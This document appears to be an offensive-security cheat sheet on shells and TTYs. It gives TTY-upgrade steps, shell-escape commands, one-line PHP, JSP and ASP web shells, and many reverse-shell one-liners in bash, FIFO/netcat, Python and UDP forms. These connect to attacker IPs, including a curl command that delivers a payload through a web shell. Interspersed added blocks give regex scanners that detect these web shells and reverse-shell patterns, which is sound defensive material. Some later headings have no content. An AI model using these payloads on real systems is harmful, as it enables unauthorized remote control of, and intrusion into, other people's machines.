
Shells/TTYs

Teletypewriters and Shells

Get a Full TTY

BASH

  1. python3 -c 'import pty; pty.spawn("/bin/bash")'

  2. CTRL+Z

  3. stty raw -echo; fg; ls; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

ZSH

  1. python3 -c 'import pty; pty.spawn("/bin/bash")'

  2. CTRL+Z

  3. stty raw -echo; fg %1; export SHELL=/bin/bash; export TERM=screen; stty rows 38 columns 116; reset;

Clear Terminal

Change the TERM environment variable to xterm:
export TERM=xterm

Terminal Size

Check your terminal size:
stty size
Now set the same size in the target shell:
stty rows <NUMBER> columns <NUMBER>

Use arrow-keys

Just run bash:
bash
Turn history on:
set -o history
  • In the .bashrc file, make sure HISTSIZE is not set to 0:

HISTSIZE=1000
HISTFILESIZE=1000

rlwrap enables line editing and history:

Listener example
rlwrap nc -lvnp <port>
Connection example
rlwrap nc 10.10.10.131 6200
Spawning Shells

The pty module in Python allows you to spawn a new process in a pseudo-terminal, effectively creating an interactive shell:

python3 -c 'import pty; pty.spawn("/bin/sh")'

The script command starts a shell session and records the session to a file. /dev/null is specified as the file where the session is "recorded", but since it's /dev/null, no logging actually happens:

script -qc /bin/bash /dev/null

It is also possible to use echo to pass os.system('/bin/bash') to the Python interpreter:

echo os.system('/bin/bash')

Spawn an interactive shell directly from the terminal:

/bin/sh -i

The command exec "/bin/sh" replaces the running Perl process with a new /bin/sh shell:

perl -e 'exec "/bin/sh";'
Spawn the shell directly
perl: exec "/bin/sh";

Ruby's exec function, like Perl's, replaces the current process with a new one, in this case /bin/sh:

ruby: exec "/bin/sh"

os.execute runs a shell command from Lua; unlike exec in Perl or Ruby it does not replace the current process, but runs /bin/sh as a child process:

lua: os.execute('/bin/sh')

Replaces the current Ruby interpreter (IRB) with the shell:

exec "/bin/sh";

From within vim, execute an external shell command:

:!bash

Changes the default shell used by vim's :! command:

:set shell=/bin/bash:shell

Spawn a shell from within the nmap interface, enabling the execution of additional shell commands while scanning:

!sh

PSY

PSY Shell is an interactive PHP REPL (Read-Eval-Print Loop) used normally for debugging.

Print the working directory
getcwd()
Print the current user
get_current_user()
Print system info
phpinfo()
Print contents from directory
scandir("/home")
Print content from file
file_get_contents("/etc/os-release")
Web Shells
PHP Shell
<?php system($_REQUEST['cmd']); ?>
Create a web shell file (double quotes around cmd so the single-quoted shell string is not broken):
echo '<?php system($_REQUEST["cmd"]); ?>' > cmd.php
JSP - Java Server Pages
<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>
ASP - Active Server Pages
<% eval request("cmd") %>
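The three one-line web shells above are what a defender should expect to find on a compromised web root. As an added example (not part of the original page), the scanner below matches the PHP, JSP and ASP patterns shown here against a constructed set of files; the signature names, file paths and contents are assumptions for the demonstration.

```python
import re

# Signatures for the minimal web shells shown on this page (constructed for this example).
WEBSHELL_SIGNATURES = {
    "php_system_request": re.compile(r"<\?php\s+system\(\s*\$_(?:REQUEST|GET|POST)\[", re.I),
    "jsp_runtime_exec_param": re.compile(r"Runtime\.getRuntime\(\)\.exec\(\s*request\.getParameter\(", re.I),
    "asp_eval_request": re.compile(r"<%\s*eval\s+request\(", re.I),
}


def scan_source(text: str) -> list[str]:
    """Return the names of the web-shell signatures found in one file's source."""
    return [name for name, rx in WEBSHELL_SIGNATURES.items() if rx.search(text)]


def scan_files(files: dict[str, str]) -> dict[str, list[str]]:
    """Scan a mapping of path -> content and report only the files that match."""
    findings = {}
    for path, content in files.items():
        hits = scan_source(content)
        if hits:
            findings[path] = hits
    return findings


# Constructed sample web root: the three shells from the page plus a benign file.
SAMPLE_FILES = {
    "/var/www/html/cmd.php": "<?php system($_REQUEST['cmd']); ?>",
    "/var/www/html/x.jsp": '<% Runtime.getRuntime().exec(request.getParameter("cmd")); %>',
    "/var/www/html/x.asp": '<% eval request("cmd") %>',
    "/var/www/html/index.php": "<?php echo htmlspecialchars($_GET['q']); ?>",
}

if __name__ == "__main__":
    for path, hits in scan_files(SAMPLE_FILES).items():
        print(f"{path}: {', '.join(hits)}")
```

Signature matching catches only the literal forms shown here; obfuscated or encoded variants need additional rules or a file-integrity baseline of the web root.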
BASH Reverse Shells
Standard
bash -i >& /dev/tcp/10.10.14.18/1337 0>&1
URL
bash+-c+'bash+-i+>%26+/dev/tcp/10.10.14.14/9001+0>%261'

FIFO

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f
URL Encoded
rm%20/tmp/f%3B%20mkfifo%20/tmp/f%3B%20cat%20/tmp/f%20%7C%20/bin/sh%20-i%202%3E%261%20%7C%20nc%2010.10.16.10%204444%20%3E%20/tmp/f
Run it in the background
nohup bash -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1" &
Python Reverse Shells

PTY

One-liner IPv4
python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.6",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'
Save in a file IPv4
echo 'import pty
import socket
import os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.16.6", 4444))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
pty.spawn("/bin/bash")
s.close()' > shell.py

subprocess

One-liner IPv4
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.157",1235));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
Save it in a file IPv4
echo 'import socket, subprocess, os

s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("10.10.14.157", 1235))
[os.dup2(s.fileno(), fd) for fd in (0, 1, 2)]
subprocess.call(["/bin/sh", "-i"])
s.close()' > shell.py
The same one-liner can also be sent through a web shell with curl:
curl http://SITE.com/shell.php --data-urlencode "cmd=python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"YOUR-IP\",PORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/sh\",\"-i\"]);'"
UDP Reverse shell
import os
os.popen("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.16.10 4444 >/tmp/f &").read()
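The bash and Python reverse shells in the two sections above share a few stable indicators (/dev/tcp redirections, mkfifo-to-nc pipelines, a socket's descriptor dup2'd onto 0/1/2, pty.spawn of a shell). As an added example (not part of the original page), the triage routine below runs those indicators over constructed process-execution log lines; the indicator names and the sample lines are assumptions for the demonstration.

```python
import re

# Indicators derived from the reverse-shell and TTY-upgrade one-liners on this page.
# Constructed for this example; order determines the order of reported hits.
REVERSE_SHELL_INDICATORS = [
    ("bash_dev_tcp", re.compile(r"/dev/tcp/\d{1,3}(?:\.\d{1,3}){3}/\d+")),
    ("fifo_nc_pipeline", re.compile(r"mkfifo\s+\S+.*\|\s*nc(?:\s+-u)?\s+\S+\s+\d+")),
    ("python_socket_dup2", re.compile(r"socket\.socket\(.*os\.dup2\(s\.fileno\(\)", re.S)),
    ("python_pty_spawn", re.compile(r"pty\.spawn\(\s*['\"]/bin/(?:ba)?sh['\"]")),
    ("nohup_background_shell", re.compile(r"nohup\s+bash\s+-c\s+.*/dev/tcp/")),
]


def classify(cmdline: str) -> list[str]:
    """Return the names of every indicator that matches one process command line."""
    return [name for name, rx in REVERSE_SHELL_INDICATORS if rx.search(cmdline)]


def triage(lines: list[str]) -> list[tuple[str, list[str]]]:
    """Keep only the log lines that match at least one indicator, with their hits."""
    return [(line, hits) for line in lines if (hits := classify(line))]


# Constructed process command lines (not real captures). The first six mirror the
# page's examples (the TTY-upgrade pty.spawn included); the last two are benign.
SAMPLE_LOG = [
    "bash -i >& /dev/tcp/10.10.14.18/1337 0>&1",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.10.10 1234 >/tmp/f",
    "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc -u 10.10.16.10 4444 >/tmp/f &",
    'nohup bash -c "bash -i >& /dev/tcp/10.10.14.6/443 0>&1" &',
    "python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);"
    "s.connect((\"10.10.16.6\",4444));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn(\"/bin/bash\")'",
    "python3 -c 'import pty; pty.spawn(\"/bin/bash\")'",
    "nc -z 10.0.0.5 443",
    "python3 manage.py runserver",
]

if __name__ == "__main__":
    for line, hits in triage(SAMPLE_LOG):
        print(f"{', '.join(hits):40s} {line[:70]}")
```

The pty.spawn indicator also fires on the TTY-upgrade step from the top of this page, which on a server that never runs interactive Python is itself worth an alert.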
PHP Reverse shell
Powershell Reverse shell
Node-Red Reverse shell
  • Once you have received the connection, use another listener to get a more stable shell:

  • Then use script:

Bind Shells
  • First, find ports where inbound connections are allowed:

Check the firewall rules in Windows:
